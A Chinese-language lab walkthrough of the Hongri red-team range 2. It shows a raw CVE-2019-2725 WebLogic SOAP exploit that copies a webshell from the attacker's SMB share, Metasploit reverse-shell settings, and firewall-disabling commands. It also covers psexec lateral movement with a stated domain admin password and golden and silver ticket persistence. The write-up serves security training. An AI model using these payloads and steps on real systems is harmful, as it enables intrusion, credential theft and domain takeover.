红日靶场2-wp
这次的记录非常详细,尝试了各种方法打点,清理痕迹等等
红日靶场2
🌋环境搭建
🚘靶场配置
靶场拓扑图如下:
首先先新建一个网卡,
PC
PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。
由于作者默认的网段设置为111,所以需要将自己的NAT也修改成111,但我习惯了自己的ip。所以就得改两个网卡,将其修改网段为自己的NAT地址,
网络配置情况如下:
DC
选择前面配置的网卡
网络配置如下
WEB
这台机器有点坑,当登录WEB虚拟机时,需要先恢复快照3,登陆时切换用户为: WEB\de1ay 密码: 1qaz@WSX 才能进入
修改NAT网卡的网段
进入目录C:\Oracle\Middleware\user_projects\domains\base_domain,运行statweblogic服务。注意要以管理员身份运行
网络配置如下:
整理如下:
| 主机 | 网卡1(内) | 网卡2(外) |
|---|---|---|
| kali | \ | 192.168.130.5 |
| WEB | 10.10.10.80 | 192.168.130.80 |
| PC | 10.10.10.201 | 192.168.130.201 |
| DC | 10.10.10.10 | \ |
💺web打点
🛹信息收集
端口服务及目录
分别扫描80的端口及服务
nmap -sV 192.168.130.80
扫了一下80端口的目录,这些目录没什么利用点
访问7001端口,是个404页面
weblogic后台登录地址:
http://your-ip:7001/console
脚本小子上线。先用goby扫一下指纹信息,有一个高危的ms17_010
vulmap扫出来一个cve-2020-2883
利用weblogic检测工具:
有cve-2020-14750和cve-2019-2725
python3 .\ws.py -t 192.168.130.80 -p 7001
🚥漏洞利用
🌆exp利用
基于前面的信息进行逐一尝试,先试试CVE-2019-2725
proxychains git clone https://github.com/TopScrew/CVE-2019-2725.git
pip install logzero
pip install requests
python weblogic-2019-2725.py 10.3.6 http://192.168.130.80:7001
访问地址:可以执行简单命令
http://192.168.130.80:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=ipconfig
但是带空格命令会报参数传递错误,下载不了
换一个exp继续尝试,首先开启共享文件夹
impacket-smbserver share /root/1/behinder/server &
在靶机这边可以访问到马子
然后准备exp,修改好HOST和马子的地址
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.130.80:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: close
Content-Type: text/xml
Content-Length: 839
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>copy \\192.168.130.5\share\shell.jsp servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\1.jsp </string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
发包,回应为202则成功
冰蝎连接马子就可以拿到shell
⛄工具利用
利用Java反序列化工具探测存在漏洞为cve-2017-10271
因为有数字卫士,普通一句话会被干。故传冰蝎马上去,下面给出了连接地址
连接成功,接下来就是转战cs还是msf
若是cs,就需要简单做个免杀
运行即可反弹到cs
若是msf则直接可以利用冰蝎里面给出的来:
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 192.168.130.5
🌗msf利用
ms17_010
cve-2020-14750
cve-2020-2883
cve-2019-2725成功
search cve-2019-2725
use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
show options
set rhosts 192.168.130.80
set lhost 192.168.130.5
set target Windows
🌈内网渗透
🛵信息收集
跳板机信息收集
直接提权不成
迁移到有system权限的进程上就可以导出密码
查看一下有哪些应用,发现了数字卫士
run post/windows/gather/enum_applications
msf派生会话至cs
内网遨游还得cs方便一些故转移会话至cs
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.130.5
set lport 9999
set session 2
cs上提权成功
搜集域内信息
查看本机ip,所在域为delay.com:
shell ipconfig /all
关闭防火墙:
shell netsh advfirewall show all state //查看防火墙状态
shell netsh advfirewall set allprofile state off //关闭防火墙
查看域控和域中的其他主机名
net group "domain controllers" /domain
net group "domain computers" /domain
🌌横向移动
生成凭证拿域控
rev2self
make_token delay.com\Administrator 1qaz@WSX
jump psexec DC smb
但是后面出现网络问题,另一台机子死活扫不到就作罢了
最终的拓扑图如下:
🌟权限维持
🌏黄金票据
从DC中hashdump出krbtgt的hash值,krbtgt用户是域中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户
在DC查看域的sid
在web主机生成黄金票据
直接远程连接dir域控c盘成功
shell dir \\10.10.10.10\c$
🕋白银票据
类似低等一点的白银票据,也是要获取sid和 hash值
cs上填入这些
黄金票据和白银票据最后都是这一步,访问域控的c盘
shell dir \\10.10.10.10\c$
